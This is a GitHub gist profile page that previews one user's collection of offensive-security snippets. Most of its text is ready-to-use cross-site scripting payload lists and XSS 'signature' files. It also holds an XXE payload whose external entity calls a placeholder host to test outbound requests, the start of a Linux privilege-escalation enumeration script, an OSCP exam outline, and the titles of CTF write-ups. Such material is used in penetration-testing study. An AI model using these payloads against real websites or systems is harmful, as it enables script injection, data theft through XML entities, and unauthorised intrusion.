Skip to content

Instantly share code, notes, and snippets.

View fb11's full-sized avatar

FB fb11

16 followers · 71 following
View GitHub Profile
@fb11
fb11 / xsspayload.txt
Last active October 15, 2022 00:59
XSS Payload
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
><img id=XSS SRC=x onerror=alert(XSS);>
;!--"<XSS>=&{()}"
<IMG id=XSS SRC="javascript:alert('XSS');">
<IMG id=XSS SRC=javascript:alert('XSS')>
<IMG id=XSS SRC=JaVaScRiPt:alert('XSS')>
<IMG id=XSS SRC=javascript:alert("XSS")>
<IMG id=XSS SRC=`javascript:alert("'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG id=XSS SRC="jav ascript:alert('XSS');">
@fb11
fb11 / gist:951549ebcd3cc545d580efb2bae3094c
Last active August 25, 2017 11:05
“>><<img src=x onerror=alert(1);//>>
“>><<img src=x onerror=alert(1);//>>
@fb11
fb11 / XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
Created October 11, 2017 16:47 — forked from xsscx/XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
/* Remote File Include with HTML TAGS via XSS.Cx */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
/* Updated September 29, 2014 */
/* RFI START */
<img language=vbs src=<b onerror=alert#1/1#>
<isindex action="javas&Tab;cript:alert(1)" type=image>
"]<img src=1 onerror=alert(1)>
<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>
@fb11
fb11 / brutelogic.md
Created October 16, 2017 17:36 — forked from toufik-airane/brutelogic.md

Credit: @brutelogic (blog)

Summary

The XSS payloads and schemes used in all posts for a quick reference.

XSS Payload Scheme

extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3

Agnostic Event Handlers

<brute contenteditable onblur=alert(1)>lose focus!
@fb11
fb11 / Deneme
Last active October 26, 2017 05:47
kod
Uzaktan Kod caistirma Basarili
@fb11
fb11 / XXE_payloads
Created November 6, 2017 11:49 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@fb11
fb11 / enum.sh
Created February 26, 2018 16:06 — forked from unfo/enum.sh
Linux priv esc. Might be out-dated script versions
#!/bin/bash
BLACK="\033[30m"
RED="\033[31m"
GREEN="\033[32m"
YELLOW="\033[33m"
BLUE="\033[34m"
PINK="\033[35m"
CYAN="\033[36m"
WHITE="\033[37m"
@fb11
fb11 / how-to-oscp-final.md
Created February 26, 2018 16:18 — forked from unfo/how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@fb11
fb11 / CTFWRITE-Blocky-HTB.md
Created March 3, 2018 22:52 — forked from berzerk0/CTFWRITE-Blocky-HTB.md
CTF Writeup: Blocky on HackTheBox
@fb11
fb11 / CTFWRITE-Europa-HTB.md
Created March 3, 2018 22:53 — forked from berzerk0/CTFWRITE-Europa-HTB.md
CTF Writeup: Europa on HackTheBox